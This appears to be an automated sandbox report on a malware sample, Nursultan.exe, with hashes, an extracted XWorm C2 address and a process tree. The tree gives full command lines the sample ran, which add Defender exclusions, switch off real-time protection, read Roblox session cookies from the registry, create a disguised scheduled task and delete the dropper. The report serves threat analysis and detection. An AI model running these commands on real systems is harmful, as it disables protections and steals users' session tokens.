Analysis
max time kernel: 124s
max time network: 130s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 09-06-2024 15:02
Static task: static1
Behavioral task: behavioral1
Sample: Nursultan.exe
Resource: win10v2004-20240508-en
General
Target: Nursultan.exe
Size: 19.8MB
MD5: 4aa0a579b602bd4434e6c857294fcca5
SHA1: 3b4fec5946e430c54ec4b9170b165c9893368c1b
SHA256: 13dcf8833f9fe533311420d9db085b180aca2ff1674e692c79b6596ebf5a83cd
SHA512: 58fc656496033afdeda99efb2d9576fcc46e4b8af96ed0d024dc13b1fd775a98dad74d53f917c0e63980129221ecd686a8e178a86da423fadaac0761d50eff4a
SSDEEP: 393216:kTspQo6f651rlw2PbRAInE5xg2N0hS+cpEMqT96SDtwdM7d3dgB7bSu8bafx3:kQuo6kBbeIACkAaE6k4MwBau8ix
Malware Config
Extracted: xworm
north-modem.gl.at.ply.gg:45517
Install_directory: %AppData%
install_file: Antimalware Service Executable.exe
Signatures

Detect Umbral payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x000500000002a954-17.dat | family_umbral
  behavioral2/memory/4552-25-0x00000216065A0000-0x00000216065E0000-memory.dmp | family_umbral

Detect Xworm Payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x000400000002a99e-42.dat | family_xworm
  behavioral2/memory/1884-53-0x00000000008E0000-0x00000000008F6000-memory.dmp | family_xworm
Command and Scripting Interpreter: PowerShell (1 TTPs, 5 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  2948 | powershell.exe
  3400 | powershell.exe
  3444 | powershell.exe
  4392 | powershell.exe
  1444 | powershell.exe
Drops file in Drivers directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | Stealeerrrl.exe

Drops startup file (2 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.lnk | sdfc.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.lnk | sdfc.exe
Executes dropped EXE (30 IoCs)
  pid | Process
  3012 | SHACTUAL.exe
  4552 | Stealeerrrl.exe
  1228 | Nursultan.exe
  1884 | sdfc.exe
  972 | 45215434532.exe
  2208 | Nursultan.exe
  2412 | Stealeerrrl.exe
  2148 | 45215434532.exe
  3096 | Nursultan.exe
  2704 | Stealeerrrl.exe
  424 | 45215434532.exe
  2012 | Nursultan.exe
  1716 | Stealeerrrl.exe
  2144 | 45215434532.exe
  416 | Nursultan.exe
  1404 | Stealeerrrl.exe
  4852 | 45215434532.exe
  1188 | Nursultan.exe
  3508 | Stealeerrrl.exe
  4660 | 45215434532.exe
  4368 | Nursultan.exe
  3764 | Stealeerrrl.exe
  1436 | 45215434532.exe
  4028 | Nursultan.exe
  2600 | Stealeerrrl.exe
  4452 | 45215434532.exe
  2288 | Nursultan.exe
  1140 | Stealeerrrl.exe
  1940 | Antimalware Service Executable.exe
  2380 | Antimalware Service Executable.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antimalware Service Executable = "C:\\Users\\Admin\\AppData\\Roaming\\Antimalware Service Executable.exe" | sdfc.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  8 | discord.com
  2 | discord.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  2 | ip-api.com

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2688 | schtasks.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
  pid | Process
  3596 | wmic.exe

Modifies registry class (1 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | taskmgr.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid | Process
  4324 | PING.EXE
Suspicious behavior: EnumeratesProcesses (41 IoCs; identical entries collapsed, repeat count in parentheses)
  pid | Process
  4552 | Stealeerrrl.exe
  2948 | powershell.exe (x2)
  3400 | powershell.exe (x2)
  2812 | powershell.exe (x2)
  3444 | powershell.exe (x2)
  4392 | powershell.exe (x2)
  1812 | powershell.exe (x2)
  1444 | powershell.exe (x2)
  2956 | powershell.exe (x2)
  984 | powershell.exe (x2)
  3948 | taskmgr.exe (x22)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 4552 | Stealeerrrl.exe
  Token: SeDebugPrivilege | 1884 | sdfc.exe
  Token: SeIncreaseQuotaPrivilege | 3956 | wmic.exe
  Token: SeSecurityPrivilege | 3956 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 3956 | wmic.exe
  Token: SeLoadDriverPrivilege | 3956 | wmic.exe
  Token: SeSystemProfilePrivilege | 3956 | wmic.exe
  Token: SeSystemtimePrivilege | 3956 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 3956 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 3956 | wmic.exe
  Token: SeCreatePagefilePrivilege | 3956 | wmic.exe
  Token: SeBackupPrivilege | 3956 | wmic.exe
  Token: SeRestorePrivilege | 3956 | wmic.exe
  Token: SeShutdownPrivilege | 3956 | wmic.exe
  Token: SeDebugPrivilege | 3956 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 3956 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 3956 | wmic.exe
  Token: SeUndockPrivilege | 3956 | wmic.exe
  Token: SeManageVolumePrivilege | 3956 | wmic.exe
  Token: 33 | 3956 | wmic.exe
  Token: 34 | 3956 | wmic.exe
  Token: 35 | 3956 | wmic.exe
  Token: 36 | 3956 | wmic.exe
  (the same 21 entries for 3956 wmic.exe are listed a second time in the report)
  Token: SeDebugPrivilege | 2948 | powershell.exe
  Token: SeDebugPrivilege | 3400 | powershell.exe
  Token: SeDebugPrivilege | 2812 | powershell.exe
  Token: SeDebugPrivilege | 3444 | powershell.exe
  Token: SeDebugPrivilege | 4392 | powershell.exe
  Token: SeDebugPrivilege | 1812 | powershell.exe
  Token: SeDebugPrivilege | 1444 | powershell.exe
  Token: SeDebugPrivilege | 2956 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4976 | wmic.exe
  Token: SeSecurityPrivilege | 4976 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 4976 | wmic.exe
  Token: SeLoadDriverPrivilege | 4976 | wmic.exe
  Token: SeSystemProfilePrivilege | 4976 | wmic.exe
  Token: SeSystemtimePrivilege | 4976 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 4976 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 4976 | wmic.exe
  Token: SeCreatePagefilePrivilege | 4976 | wmic.exe
  Token: SeBackupPrivilege | 4976 | wmic.exe
  Token: SeRestorePrivilege | 4976 | wmic.exe
  Token: SeShutdownPrivilege | 4976 | wmic.exe
Suspicious use of FindShellTrayWindow (47 IoCs)
  pid | Process
  3948 | taskmgr.exe (47 identical entries)

Suspicious use of SendNotifyMessage (47 IoCs)
  pid | Process
  3948 | taskmgr.exe (47 identical entries)
Suspicious use of WriteProcessMemory (64 IoCs; every entry is listed twice in the report and shown once here)
  description | pid | Process | procid_target
  PID 2216 wrote to memory of 3012 | 2216 | Nursultan.exe | 78
  PID 2216 wrote to memory of 4552 | 2216 | Nursultan.exe | 79
  PID 2216 wrote to memory of 1228 | 2216 | Nursultan.exe | 81
  PID 2216 wrote to memory of 1884 | 2216 | Nursultan.exe | 82
  PID 1228 wrote to memory of 972 | 1228 | Nursultan.exe | 83
  PID 1228 wrote to memory of 2208 | 1228 | Nursultan.exe | 84
  PID 1228 wrote to memory of 2412 | 1228 | Nursultan.exe | 85
  PID 2208 wrote to memory of 2148 | 2208 | Nursultan.exe | 86
  PID 2208 wrote to memory of 3096 | 2208 | Nursultan.exe | 87
  PID 2208 wrote to memory of 2704 | 2208 | Nursultan.exe | 88
  PID 4552 wrote to memory of 3956 | 4552 | Stealeerrrl.exe | 89
  PID 3096 wrote to memory of 424 | 3096 | Nursultan.exe | 91
  PID 3096 wrote to memory of 2012 | 3096 | Nursultan.exe | 92
  PID 3096 wrote to memory of 1716 | 3096 | Nursultan.exe | 93
  PID 2012 wrote to memory of 2144 | 2012 | Nursultan.exe | 94
  PID 2012 wrote to memory of 416 | 2012 | Nursultan.exe | 95
  PID 2012 wrote to memory of 1404 | 2012 | Nursultan.exe | 96
  PID 416 wrote to memory of 4852 | 416 | Nursultan.exe | 97
  PID 4552 wrote to memory of 3056 | 4552 | Stealeerrrl.exe | 98
  PID 4552 wrote to memory of 2948 | 4552 | Stealeerrrl.exe | 128
  PID 416 wrote to memory of 1188 | 416 | Nursultan.exe | 102
  PID 416 wrote to memory of 3508 | 416 | Nursultan.exe | 103
  PID 1188 wrote to memory of 4660 | 1188 | Nursultan.exe | 104
  PID 1884 wrote to memory of 3400 | 1884 | sdfc.exe | 105
  PID 1188 wrote to memory of 4368 | 1188 | Nursultan.exe | 107
  PID 1188 wrote to memory of 3764 | 1188 | Nursultan.exe | 108
  PID 4552 wrote to memory of 2812 | 4552 | Stealeerrrl.exe | 109
  PID 4368 wrote to memory of 1436 | 4368 | Nursultan.exe | 111
  PID 1884 wrote to memory of 3444 | 1884 | sdfc.exe | 112
  PID 4368 wrote to memory of 4028 | 4368 | Nursultan.exe | 113
  PID 4368 wrote to memory of 2600 | 4368 | Nursultan.exe | 115
  PID 4028 wrote to memory of 4452 | 4028 | Nursultan.exe | 116
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid | Process
  3056 | attrib.exe
Processes (indented by parent/child depth; each entry gives the image path, PID, command line and matched signatures)

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe (PID 2216)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Roaming\SHACTUAL.exe (PID 3012)
    cmdline: "C:\Users\Admin\AppData\Roaming\SHACTUAL.exe"
    - Executes dropped EXE

  C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 4552)
    cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\wmic.exe (PID 3956)
      cmdline: "wmic.exe" csproduct get uuid
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SYSTEM32\attrib.exe (PID 3056)
      cmdline: "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
      - Views/modifies file attributes

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2948)
      cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2812)
      cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1812)
      cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2956)
      cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\wmic.exe (PID 4976)
      cmdline: "wmic.exe" os get Caption
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\wmic.exe (PID 4864)
      cmdline: "wmic.exe" computersystem get totalphysicalmemory

    C:\Windows\System32\Wbem\wmic.exe (PID 3504)
      cmdline: "wmic.exe" csproduct get uuid

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 984)
      cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\System32\Wbem\wmic.exe (PID 3596)
      cmdline: "wmic" path win32_VideoController get name
      - Detects videocard installed

    C:\Windows\SYSTEM32\cmd.exe (PID 1680)
      cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe" && pause

      C:\Windows\system32\PING.EXE (PID 4324)
        cmdline: ping localhost
        - Runs ping.exe

  C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 1228)
    cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 972)
      cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
      - Executes dropped EXE

    C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 2208)
      cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 2148)
        cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
        - Executes dropped EXE

      C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 3096)
        cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 424)
          cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
          - Executes dropped EXE

        C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 2012)
          cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

          C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 2144)
            cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
            - Executes dropped EXE

          C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 416)
            cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 4852)
              cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
              - Executes dropped EXE

            C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 1188)
              cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory

              C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 4660)
                cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
                - Executes dropped EXE

              C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 4368)
                cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
                - Executes dropped EXE
                - Suspicious use of WriteProcessMemory

                C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 1436)
                  cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
                  - Executes dropped EXE

                C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 4028)
                  cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
                  - Executes dropped EXE
                  - Suspicious use of WriteProcessMemory

                  C:\Users\Admin\AppData\Roaming\45215434532.exe (PID 4452)
                    cmdline: "C:\Users\Admin\AppData\Roaming\45215434532.exe"
                    - Executes dropped EXE

                  C:\Users\Admin\AppData\Roaming\Nursultan.exe (PID 2288)
                    cmdline: "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
                    - Executes dropped EXE

                  C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 1140)
                    cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
                    - Executes dropped EXE

                C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 2600)
                  cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
                  - Executes dropped EXE

              C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 3764)
                cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
                - Executes dropped EXE

            C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 3508)
              cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
              - Executes dropped EXE

          C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 1404)
            cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
            - Executes dropped EXE

        C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 1716)
          cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
          - Executes dropped EXE

      C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 2704)
        cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
        - Executes dropped EXE

    C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe (PID 2412)
      cmdline: "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"
      - Executes dropped EXE

  C:\Users\Admin\AppData\Roaming\sdfc.exe (PID 1884)
    cmdline: "C:\Users\Admin\AppData\Roaming\sdfc.exe"
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3400)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\sdfc.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3444)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sdfc.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4392)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1444)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Antimalware Service Executable.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\schtasks.exe (PID 2688)
      cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Antimalware Service Executable" /tr "C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"
      - Creates scheduled task(s)

      C:\Windows\System32\Conhost.exe (PID 2948)
        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe (PID 1940)
  cmdline: "C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"
  - Executes dropped EXE

C:\Windows\system32\taskmgr.exe (PID 3948)
  cmdline: "C:\Windows\system32\taskmgr.exe" /0
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

C:\Windows\System32\rundll32.exe (PID 1944)
  cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe (PID 2380)
  cmdline: "C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"
  - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (1)
  Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)

Privilege Escalation
  Boot or Logon Autostart Execution (1)
  Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)

Defense Evasion
  Hide Artifacts (1)
  Hidden Files and Directories (1)
  Modify Registry (1)
Downloads